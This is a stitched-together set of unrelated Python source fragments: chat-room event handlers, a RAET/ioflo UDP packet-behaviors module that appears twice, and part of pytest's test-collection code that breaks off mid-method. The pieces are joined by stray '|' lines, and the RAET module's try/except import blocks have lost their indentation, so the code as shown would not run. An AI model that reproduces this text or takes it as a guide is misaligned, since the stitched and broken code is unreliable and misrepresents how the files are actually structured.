def on_kick(data: dict, activity: Activity) -> (int, None):
    """
    kick a user from a room (if user is an owner)

    target.id: the uuid of the room that the user is in
    target.displayName: the room name
    object.id: the id of the user to kick
    object.content: the name of the user to kick
    actor.id: the id of the kicker
    actor.content: the name of the kicker

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_kick', (data, activity))
    return ECodes.OK, None
def on_whisper(data: dict, activity: Activity) -> (int, None):
    """
    whisper to another person in the same room; only that person will receive the event, so it
    functions as a private message

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_whisper', (data, activity))
    return ECodes.OK, None
def on_invite(data: dict, activity: Activity) -> (int, None):
    """
    Invite another user to a room the sender is currently in.

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    payload = (data, activity)
    environ.env.observer.emit('on_invite', payload)
    return ECodes.OK, None
def on_request_admin(data: dict, activity: Activity) -> (int, None):
    """
    Ask for an admin to join the current room.

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    payload = (data, activity)
    environ.env.observer.emit('on_request_admin', payload)
    return ECodes.OK, None
def on_create(data: dict, activity: Activity) -> (int, dict):
    """
    Create a new room.

    :param data: activity streams format, must include target.display_name (room name) and object.id (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': ECodes.OK, 'data': '<same AS as in the request, with addition of target.id (generated UUID
    for the new room>'}, else: {'status_code': 400, 'data': '<error message>'}
    """
    # assign a server-generated uuid to the new room before handing off
    room_id = str(uuid())
    activity.target.id = room_id
    data['target']['id'] = room_id
    environ.env.observer.emit('on_create', (data, activity))
    return ECodes.OK, data
def on_set_acl(data: dict, activity: Activity) -> (int, str):
    """
    Update the ACLs of a room; only allowed for the room owner.

    :param data: activity streams, acls as attachments to object with object_type as acl name and content as acl value
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    payload = (data, activity)
    environ.env.observer.emit('on_set_acl', payload)
    return ECodes.OK, None
def on_get_acl(data: dict, activity: Activity) -> (int, Union[str, dict]):
    """
    Fetch the ACLs of a channel or room (depending on target.object_type).

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<AS with acl as object.attachments>'}
    """
    target_id = activity.target.id
    if activity.target.object_type == ApiTargets.CHANNEL:
        acls = utils.get_acls_for_channel(target_id)
    else:
        acls = utils.get_acls_for_room(target_id)
    environ.env.observer.emit('on_get_acl', (data, activity))
    return ECodes.OK, utils.activity_for_get_acl(activity, acls)
def on_status(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    Change the online status of a user.

    :param data: activity streams format, needs actor.id (user id), actor.summary (user name) and verb
    (online/invisible/offline)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    payload = (data, activity)
    environ.env.observer.emit('on_status', payload)
    return ECodes.OK, None
def on_history(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    Fetch the message history of a room.

    The 'updated' field is optional; when present, only history since that
    point is returned (requires dino to be configured with history type
    'unread' instead of 'top').

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    messages = utils.get_history_for_room(
        activity.target.id, activity.actor.id, activity.updated)
    environ.env.observer.emit('on_history', (data, activity))
    return ECodes.OK, utils.activity_for_history(activity, messages)
def on_join(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    Join a room, returning the room's history, owners, ACLs and user list.

    :param data: activity streams format, need actor.id (user id), target.id (user id), actor.summary (user name)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    # todo: how to deal with invisibility here?
    room_id = activity.target.id
    user_id = activity.actor.id
    messages = utils.get_history_for_room(room_id, user_id, activity.updated)
    owners = utils.get_owners_for_room(room_id)
    acls = utils.get_acls_for_room(room_id)
    users = utils.get_users_in_room(room_id)
    environ.env.observer.emit('on_join', (data, activity))
    return ECodes.OK, utils.activity_for_join(activity, acls, messages, owners, users)
def on_users_in_room(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    List the users currently in a room.

    :param data: activity streams format, need target.id (room id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with users as object.attachments>}
    """
    # TODO: should people not in the room be able to list users in the room?
    users = utils.get_users_in_room(activity.target.id)
    environ.env.observer.emit('on_users_in_room', (data, activity))
    return ECodes.OK, utils.activity_for_users_in_room(activity, users)
def on_list_rooms(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    get a list of rooms for a channel
    :param data: activity streams format, needs actor.id (user id) and object.url (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with rooms as object.attachments>}
    """
    # note: the channel id is carried in object.url, not object.id
    channel_id = activity.object.url
    rooms = environ.env.db.rooms_for_channel(channel_id)
    environ.env.observer.emit('on_list_rooms', (data, activity))
    return ECodes.OK, utils.activity_for_list_rooms(activity, rooms)
def on_list_channels(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    List all available channels.

    :param data: activity streams format, needs actor.id (user id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with channels as object.attachments>}
    """
    channels = environ.env.db.get_channels()
    environ.env.observer.emit('on_list_channels', (data, activity))
    return ECodes.OK, utils.activity_for_list_channels(activity, channels)
def on_leave(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    Leave a room.

    :param data: activity streams format, needs actor.id (user id), actor.summary (user name), target.id (room id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    payload = (data, activity)
    environ.env.observer.emit('on_leave', payload)
    return ECodes.OK, None
def on_disconnect() -> (int, None):
    """
    Handle a client disconnect, either explicit or because the server stopped
    receiving ping responses from the client.

    :return: if ok, {'status_code': 200}
    """
    environ.env.observer.emit('on_disconnect', (None, None))
    return ECodes.OK, None
|
# -*- coding: utf-8 -*-
'''
behaving.py raet ioflo behaviors
See raeting.py for data format and packet field details.
Data format. The data from which a packet is created is a nested dict of dicts.
What fields are included in a packed head, neck, body is dependent
on the header kind, service kind, packet kind and defaults.
To minimize length of JSON headers if field missing then the default is assumed
data =
{
meta: dict of meta data about packet
{
}
head: dict of header fields
{
pack: packed version of header
}
neck: dict of authentication fields
{
pack: packed version of neck
}
body: dict of body fields
{
pack: packed version of body
}
pack: packed version of whole packet on tx and raw packet on rx
}
'''
# pylint: disable=W0611
# Import Python libs
from collections import deque
try:
import simplejson as json
except ImportError:
import json
# Import ioflo libs
from ioflo.base.odicting import odict
from ioflo.base.globaling import *
from ioflo.base import aiding
from ioflo.base import storing
from ioflo.base import deeding
from ioflo.base.consoling import getConsole
console = getConsole()
from . import raeting
class ComposerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ComposerRaet creates packet data as nested dicts from fields in
    share parms meta, head, neck, body, tail
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    # iown=True (boolean) for consistency with the other deeds in this
    # module; the original string 'True' was truthy but inconsistent.
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        meta='meta',
        head='head',
        neck='neck',
        body='body',
        tail='tail')
    def action(self, data, meta, head, neck, body, tail, **kwa):
        '''
        Build packet data from data section shares.
        Starts from raeting.defaultData(), layers the META/HEAD defaults
        under the share values, and stores the assembled dict in data.value.
        '''
        dat = raeting.defaultData()
        dat['meta'].update(raeting.META_DEFAULTS)
        dat['meta'].update(meta.items())
        dat['head'].update(raeting.HEAD_DEFAULTS)
        dat['head'].update(head.items())
        dat['neck'].update(neck.items())
        dat['body'].update(data=odict(body.items()))
        dat['tail'].update(tail.items())
        data.value = dat
        return None
class PackerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    PackerRaet creates a new packed RAET packet from data and fills in pack field
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        outlog=odict(ipath='outlog', ival=odict(), iown=True),)
    def action(self, data, outlog, **kwa):
        '''Pack the packet held in data and log its body by destination address.'''
        if not data.value:
            return None
        raeting.packPacket(data.value)
        data.stampNow()
        meta = data.value['meta']
        outlog.value[(meta['dh'], meta['dp'])] = data.value['body'].get('data', {})
        return None
class ParserRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ParserRaet parses a packed RAET packet from pack and fills in data
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        inlog=odict(ipath='inlog', ival=odict(), iown=True),)
    def action(self, data, inlog, **kwa):
        '''
        Parse packet from raw packed and log the parsed body by source address.
        '''
        if data.value:
            data.value = raeting.defaultData(data.value)
            # parsePacket mutates data.value in place; the returned remainder
            # is not needed here (the unused `rest` binding was removed)
            raeting.parsePacket(data.value)
            data.stampNow()
            inlog.value[(data.value['meta']['sh'], data.value['meta']['sp'])] = data.value['body'].get('data', {})
        return None
class TransmitterRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    TransmitterRaet pushes packed packet in onto txes transmit deque and assigns
    destination ha from meta data
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data='data',
        txes=odict(ipath='.raet.media.txes', ival=deque()),)
    def action(self, data, txes, **kwa):
        '''Queue the packed packet for transmission to its destination address.'''
        if not data.value:
            return None
        meta = data.value['meta']
        destination = (meta['dh'], meta['dp'])
        txes.value.append((data.value['pack'], destination))
        return None
class ReceiverRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ReceiverRaet pulls packet from rxes deque and puts into new data
    and assigns meta data source ha using received ha
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data='data',
        rxes=odict(ipath='.raet.media.rxes', ival=deque()), )
    def action(self, data, rxes, **kwa):
        '''Pop the next received packet and seed a fresh data dict with its addresses.'''
        if not rxes.value:
            return None
        raw, source, destination = rxes.value.popleft()
        fresh = raeting.defaultData()
        fresh['pack'] = raw
        fresh['meta']['sh'], fresh['meta']['sp'] = source
        fresh['meta']['dh'], fresh['meta']['dp'] = destination
        data.value = fresh
        return None
class ServerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ServerRaet transmits and receives udp packets from txes and rxes deques
    using sh, sp fields in sa server address (server host, server port) to receive on.
    Server is nonblocking socket connection
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        txes=odict(ipath='txes', ival=deque(), iown=True),
        rxes=odict(ipath='rxes', ival=deque(), iown=True),
        connection=odict(ipath='connection', ival=None, iown=True),
        address=odict(ipath='address', ival=odict(host='', port=7530, ha=None)),
        txlog=odict(ipath='txlog', ival=odict(), iown=True),
        rxlog=odict(ipath='rxlog', ival=odict(), iown=True), )
    def postinitio(self, connection, address, **kwa):
        '''
        Set up server to transmit and receive on address
        '''
        connection.value = aiding.SocketUdpNb(host=address.data.host, port=address.data.port)
        connection.value.reopen() # create socket connection
        # the OS may assign an ephemeral port; publish the actual bound ha
        host, port = connection.value.ha
        address.update(host=host, port=port, ha=(host, port))
        return None
    def action(self, txes, rxes, connection, address, txlog, rxlog, **kwa):
        '''
        Receive any udp packets on server socket and put in rxes
        Send any packets in txes
        '''
        server = connection.value
        txl = txlog.value
        rxl = rxlog.value
        if server:
            rxds = rxes.value
            # drain the nonblocking socket until a read yields no data
            while True:
                rx, ra = server.receive()  # if no data the tuple is ('',None)
                if not rx:  # no received data so break
                    break
                rxds.append((rx, ra, address.data.ha))
                rxl[ra] = rx
            txds = txes.value
            # flush every queued outbound packet
            while txds:
                tx, ta = txds.popleft()
                server.send(tx, ta)
                txl[ta] = tx
        return None
class CloserServerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    CloserServerRaet closes server socket connection
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        connection=odict(ipath='connection', ival=None))
    def action(self, connection, **kwa):
        '''
        Close the server socket connection if it is open.
        (The previous docstring was copy-pasted from ServerRaet.action.)
        '''
        if connection.value:
            connection.value.close()
        return None
# Make Pylint ignore file
# -*- coding: utf-8 -*-
'''
behaving.py raet ioflo behaviors
See raeting.py for data format and packet field details.
Data format. The data from which a packet is created is a nested dict of dicts.
What fields are included in a packed head, neck, body is dependent
on the header kind, service kind, packet kind and defaults.
To minimize length of JSON headers if field missing then the default is assumed
data =
{
meta: dict of meta data about packet
{
}
head: dict of header fields
{
pack: packed version of header
}
neck: dict of authentication fields
{
pack: packed version of neck
}
body: dict of body fields
{
pack: packed version of body
}
pack: packed version of whole packet on tx and raw packet on rx
}
'''
# pylint: skip-file
# pylint: disable=W0611
# Import Python libs
from collections import deque
try:
import simplejson as json
except ImportError:
import json
# Import ioflo libs
from ioflo.base.odicting import odict
from ioflo.base.globaling import *
from ioflo.base import aiding
from ioflo.base import storing
from ioflo.base import deeding
from ioflo.base.consoling import getConsole
console = getConsole()
from . import raeting
class ComposerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ComposerRaet creates packet data as nested dicts from fields in
    share parms meta, head, neck, body, tail
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    # iown=True (boolean) for consistency with the other deeds in this
    # module; the original string 'True' was truthy but inconsistent.
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        meta='meta',
        head='head',
        neck='neck',
        body='body',
        tail='tail')
    def action(self, data, meta, head, neck, body, tail, **kwa):
        '''
        Build packet data from data section shares.
        Starts from raeting.defaultData(), layers the META/HEAD defaults
        under the share values, and stores the assembled dict in data.value.
        '''
        dat = raeting.defaultData()
        dat['meta'].update(raeting.META_DEFAULTS)
        dat['meta'].update(meta.items())
        dat['head'].update(raeting.HEAD_DEFAULTS)
        dat['head'].update(head.items())
        dat['neck'].update(neck.items())
        dat['body'].update(data=odict(body.items()))
        dat['tail'].update(tail.items())
        data.value = dat
        return None
class PackerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    PackerRaet creates a new packed RAET packet from data and fills in pack field
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        outlog=odict(ipath='outlog', ival=odict(), iown=True),)
    def action(self, data, outlog, **kwa):
        '''Pack the packet held in data and log its body by destination address.'''
        if not data.value:
            return None
        raeting.packPacket(data.value)
        data.stampNow()
        meta = data.value['meta']
        outlog.value[(meta['dh'], meta['dp'])] = data.value['body'].get('data', {})
        return None
class ParserRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ParserRaet parses a packed RAET packet from pack and fills in data
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data=odict(ipath='data', ival=odict(), iown=True),
        inlog=odict(ipath='inlog', ival=odict(), iown=True),)
    def action(self, data, inlog, **kwa):
        '''
        Parse packet from raw packed and log the parsed body by source address.
        '''
        if data.value:
            data.value = raeting.defaultData(data.value)
            # parsePacket mutates data.value in place; the returned remainder
            # is not needed here (the unused `rest` binding was removed)
            raeting.parsePacket(data.value)
            data.stampNow()
            inlog.value[(data.value['meta']['sh'], data.value['meta']['sp'])] = data.value['body'].get('data', {})
        return None
class TransmitterRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    TransmitterRaet pushes packed packet in onto txes transmit deque and assigns
    destination ha from meta data
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data='data',
        txes=odict(ipath='.raet.media.txes', ival=deque()),)
    def action(self, data, txes, **kwa):
        '''Queue the packed packet for transmission to its destination address.'''
        if not data.value:
            return None
        meta = data.value['meta']
        destination = (meta['dh'], meta['dp'])
        txes.value.append((data.value['pack'], destination))
        return None
class ReceiverRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ReceiverRaet pulls packet from rxes deque and puts into new data
    and assigns meta data source ha using received ha
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        data='data',
        rxes=odict(ipath='.raet.media.rxes', ival=deque()), )
    def action(self, data, rxes, **kwa):
        '''Pop the next received packet and seed a fresh data dict with its addresses.'''
        if not rxes.value:
            return None
        raw, source, destination = rxes.value.popleft()
        fresh = raeting.defaultData()
        fresh['pack'] = raw
        fresh['meta']['sh'], fresh['meta']['sp'] = source
        fresh['meta']['dh'], fresh['meta']['dp'] = destination
        data.value = fresh
        return None
class ServerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    ServerRaet transmits and receives udp packets from txes and rxes deques
    using sh, sp fields in sa server address (server host, server port) to receive on.
    Server is nonblocking socket connection
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        txes=odict(ipath='txes', ival=deque(), iown=True),
        rxes=odict(ipath='rxes', ival=deque(), iown=True),
        connection=odict(ipath='connection', ival=None, iown=True),
        address=odict(ipath='address', ival=odict(host='', port=7530, ha=None)),
        txlog=odict(ipath='txlog', ival=odict(), iown=True),
        rxlog=odict(ipath='rxlog', ival=odict(), iown=True), )
    def postinitio(self, connection, address, **kwa):
        '''
        Set up server to transmit and receive on address
        '''
        connection.value = aiding.SocketUdpNb(host=address.data.host, port=address.data.port)
        connection.value.reopen() # create socket connection
        # the OS may assign an ephemeral port; publish the actual bound ha
        host, port = connection.value.ha
        address.update(host=host, port=port, ha=(host, port))
        return None
    def action(self, txes, rxes, connection, address, txlog, rxlog, **kwa):
        '''
        Receive any udp packets on server socket and put in rxes
        Send any packets in txes
        '''
        server = connection.value
        txl = txlog.value
        rxl = rxlog.value
        if server:
            rxds = rxes.value
            # drain the nonblocking socket until a read yields no data
            while True:
                rx, ra = server.receive()  # if no data the tuple is ('',None)
                if not rx:  # no received data so break
                    break
                rxds.append((rx, ra, address.data.ha))
                rxl[ra] = rx
            txds = txes.value
            # flush every queued outbound packet
            while txds:
                tx, ta = txds.popleft()
                server.send(tx, ta)
                txl[ta] = tx
        return None
class CloserServerRaet(deeding.ParamDeed):  # pylint: disable=W0232
    '''
    CloserServerRaet closes server socket connection
    inherited attributes
        .name is actor name string
        .store is data store ref
        .ioinits is dict of io init data for initio
        ._parametric is flag for initio to not create attributes
    '''
    Ioinits = odict(
        connection=odict(ipath='connection', ival=None))
    def action(self, connection, **kwa):
        '''
        Close the server socket connection if it is open.
        (The previous docstring was copy-pasted from ServerRaet.action.)
        '''
        if connection.value:
            connection.value.close()
        return None
|
""" Python test discovery, setup and run of test functions. """
import enum
import fnmatch
import inspect
import os
import sys
import warnings
from collections import Counter
from collections.abc import Sequence
from functools import partial
from textwrap import dedent
from typing import Tuple
import py
import _pytest
from _pytest import fixtures
from _pytest import nodes
from _pytest._code import filter_traceback
from _pytest.compat import ascii_escaped
from _pytest.compat import get_default_arg_names
from _pytest.compat import get_real_func
from _pytest.compat import getfslineno
from _pytest.compat import getimfunc
from _pytest.compat import getlocation
from _pytest.compat import is_generator
from _pytest.compat import iscoroutinefunction
from _pytest.compat import NOTSET
from _pytest.compat import REGEX_TYPE
from _pytest.compat import safe_getattr
from _pytest.compat import safe_isclass
from _pytest.compat import STRING_TYPES
from _pytest.config import hookimpl
from _pytest.deprecated import FUNCARGNAMES
from _pytest.main import FSHookProxy
from _pytest.mark import MARK_GEN
from _pytest.mark.structures import get_unpacked_marks
from _pytest.mark.structures import normalize_mark_list
from _pytest.outcomes import fail
from _pytest.outcomes import skip
from _pytest.pathlib import parts
from _pytest.warning_types import PytestCollectionWarning
from _pytest.warning_types import PytestUnhandledCoroutineWarning
def pyobj_property(name):
    """Build a read-only property that walks up the collection tree to the
    nearest parent node of the given pytest node class and returns its
    ``obj`` (or ``None`` when no such parent exists)."""

    def get(self):
        parent = self.getparent(getattr(__import__("pytest"), name))
        if parent is None:
            return None
        return parent.obj

    doc = "python {} object this node was collected from (can be None).".format(
        name.lower()
    )
    return property(get, None, None, doc)
def pytest_addoption(parser):
    """Register command-line options and ini settings for Python test
    discovery and fixture reporting."""
    group = parser.getgroup("general")
    group.addoption(
        "--fixtures",
        "--funcargs",
        action="store_true",
        dest="showfixtures",
        default=False,
        help="show available fixtures, sorted by plugin appearance "
        "(fixtures with leading '_' are only shown with '-v')",
    )
    group.addoption(
        "--fixtures-per-test",
        action="store_true",
        dest="show_fixtures_per_test",
        default=False,
        help="show fixtures per test",
    )
    # glob patterns deciding which files are collected as test modules
    parser.addini(
        "python_files",
        type="args",
        # NOTE: default is also used in AssertionRewritingHook.
        default=["test_*.py", "*_test.py"],
        help="glob-style file patterns for Python test module discovery",
    )
    parser.addini(
        "python_classes",
        type="args",
        default=["Test"],
        help="prefixes or glob names for Python test class discovery",
    )
    parser.addini(
        "python_functions",
        type="args",
        default=["test"],
        help="prefixes or glob names for Python test function and method discovery",
    )
    parser.addini(
        "disable_test_id_escaping_and_forfeit_all_rights_to_community_support",
        type="bool",
        default=False,
        help="disable string escape non-ascii characters, might cause unwanted "
        "side effects(use at your own risk)",
    )
    group.addoption(
        "--import-mode",
        default="prepend",
        choices=["prepend", "append"],
        dest="importmode",
        help="prepend/append to sys.path when importing test modules, "
        "default is to prepend.",
    )
def pytest_cmdline_main(config):
    """Short-circuit the test run for the fixture-listing CLI modes.

    Returns 0 (success exit code) after listing fixtures; returns None to
    let the normal pytest run proceed.
    """
    opts = config.option
    if opts.showfixtures:
        showfixtures(config)
        return 0
    if opts.show_fixtures_per_test:
        show_fixtures_per_test(config)
        return 0
def pytest_generate_tests(metafunc):
    """Apply ``parametrize`` markers; reject common misspellings with a
    clear, actionable error instead of silently ignoring them."""
    for wrong in ("parameterize", "parametrise", "parameterise"):
        if metafunc.definition.get_closest_marker(wrong):
            msg = "{0} has '{1}' mark, spelling should be 'parametrize'"
            fail(msg.format(metafunc.function.__name__, wrong), pytrace=False)
    for marker in metafunc.definition.iter_markers(name="parametrize"):
        metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
    """Register the ``parametrize`` and ``usefixtures`` marker descriptions
    shown by ``pytest --markers``."""
    config.addinivalue_line(
        "markers",
        "parametrize(argnames, argvalues): call a test function multiple "
        "times passing in different arguments in turn. argvalues generally "
        "needs to be a list of values if argnames specifies only one name "
        "or a list of tuples of values if argnames specifies multiple names. "
        "Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
        "decorated test function, one with arg1=1 and another with arg1=2."
        "see https://docs.pytest.org/en/latest/parametrize.html for more info "
        "and examples.",
    )
    config.addinivalue_line(
        "markers",
        "usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
        "all of the specified fixtures. see "
        "https://docs.pytest.org/en/latest/fixture.html#usefixtures ",
    )
@hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
    """Call the underlying test function with its resolved fixture arguments.

    Async test functions (coroutines and, on Python >= 3.6, async
    generators) are not natively supported: a warning is emitted and the
    test is skipped, pointing the user at a suitable async plugin.
    """

    def async_warn():
        msg = "async def functions are not natively supported and have been skipped.\n"
        msg += "You need to install a suitable plugin for your async framework, for example:\n"
        msg += " - pytest-asyncio\n"
        msg += " - pytest-trio\n"
        msg += " - pytest-tornasync"
        # NOTE: `msg` contains no replacement fields, so the original
        # `msg.format(pyfuncitem.nodeid)` was a no-op and has been removed.
        warnings.warn(PytestUnhandledCoroutineWarning(msg))
        skip(msg="async def function and no async plugin installed (see warnings)")

    testfunction = pyfuncitem.obj
    if iscoroutinefunction(testfunction) or (
        sys.version_info >= (3, 6) and inspect.isasyncgenfunction(testfunction)
    ):
        async_warn()
    funcargs = pyfuncitem.funcargs
    testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}
    result = testfunction(**testargs)
    # a plain function that *returned* an awaitable/async iterator is also
    # an unsupported async test
    if hasattr(result, "__await__") or hasattr(result, "__aiter__"):
        async_warn()
    return True
def pytest_collect_file(path, parent):
    """Collect ``.py`` files that are init paths or match the configured
    test-file patterns, delegating module creation to the hook."""
    if path.ext != ".py":
        return None
    if not parent.session.isinitpath(path) and not path_matches_patterns(
        path, parent.config.getini("python_files") + ["__init__.py"]
    ):
        return None
    ihook = parent.session.gethookproxy(path)
    return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def path_matches_patterns(path, patterns):
    """Return True when *path* (a ``py.path.local``) matches at least one
    of the glob *patterns*."""
    for pattern in patterns:
        if path.fnmatch(pattern):
            return True
    return False
def pytest_pycollect_makemodule(path, parent):
    """Create a ``Package`` collector for ``__init__.py`` files, a plain
    ``Module`` collector for everything else."""
    collector_class = Package if path.basename == "__init__.py" else Module
    return collector_class(path, parent)
@hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
    """Fallback collection of a module/class attribute as a test item.

    Runs as a hook wrapper: only acts when no other plugin produced a
    result. Classes become ``Class`` collectors; test-like callables become
    ``Function`` items (or a warning when they are not real functions).
    """
    outcome = yield
    res = outcome.get_result()
    if res is not None:
        return
    # nothing was collected elsewhere, let's do it here
    if safe_isclass(obj):
        if collector.istestclass(obj, name):
            outcome.force_result(Class(name, parent=collector))
    elif collector.istestfunction(obj, name):
        # mock seems to store unbound methods (issue473), normalize it
        obj = getattr(obj, "__func__", obj)
        # We need to try and unwrap the function if it's a functools.partial
        # or a functools.wrapped.
        # We mustn't if it's been wrapped with mock.patch (python 2 only)
        if not (inspect.isfunction(obj) or inspect.isfunction(get_real_func(obj))):
            filename, lineno = getfslineno(obj)
            warnings.warn_explicit(
                message=PytestCollectionWarning(
                    "cannot collect %r because it is not a function." % name
                ),
                category=None,
                filename=str(filename),
                lineno=lineno + 1,
            )
        elif getattr(obj, "__test__", True):
            if is_generator(obj):
                # yield tests are collected but marked xfail so the removal
                # is reported rather than silent
                res = Function(name, parent=collector)
                reason = "yield tests were removed in pytest 4.0 - {name} will be ignored".format(
                    name=name
                )
                res.add_marker(MARK_GEN.xfail(run=False, reason=reason))
                res.warn(PytestCollectionWarning(reason))
            else:
                res = list(collector._genfunctions(name, obj))
            outcome.force_result(res)
def pytest_make_parametrize_id(config, val, argname=None):
    """Default hook implementation: return None so id generation falls
    through to other plugins / the built-in id logic."""
    return None
class PyobjContext:
    # Convenience accessors that walk up the collection tree to the nearest
    # parent node of the given kind and return its python object (can be None).
    module = pyobj_property("Module")
    cls = pyobj_property("Class")
    instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
    """Mixin for nodes that wrap an underlying Python object."""

    # subclasses (e.g. Instance) set this False to avoid duplicating markers
    _ALLOW_MARKERS = True
    @property
    def obj(self):
        """Underlying Python object (lazily resolved via ``_getobj``)."""
        obj = getattr(self, "_obj", None)
        if obj is None:
            self._obj = obj = self._getobj()
            # XXX evil hack
            # used to avoid Instance collector marker duplication
            # NOTE: marker collection happens only on the FIRST access,
            # so the assignment above must precede this extend
            if self._ALLOW_MARKERS:
                self.own_markers.extend(get_unpacked_marks(self.obj))
        return obj
    @obj.setter
    def obj(self, value):
        self._obj = value
    def _getobj(self):
        """Gets the underlying Python object. May be overwritten by subclasses."""
        return getattr(self.parent.obj, self.name)
    def getmodpath(self, stopatmodule=True, includemodule=False):
        """ return python path relative to the containing module. """
        chain = self.listchain()
        chain.reverse()
        parts = []
        # walk from this node up towards the root, skipping Instance nodes
        for node in chain:
            if isinstance(node, Instance):
                continue
            name = node.name
            if isinstance(node, Module):
                name = os.path.splitext(name)[0]
                if stopatmodule:
                    if includemodule:
                        parts.append(name)
                    break
            parts.append(name)
        parts.reverse()
        s = ".".join(parts)
        # parametrized ids like "cls.[x]" normalize to "cls[x]"
        return s.replace(".[", "[")
    def reportinfo(self) -> Tuple[str, int, str]:
        """Return (fspath, line number, test address) for reporting."""
        # XXX caching?
        obj = self.obj
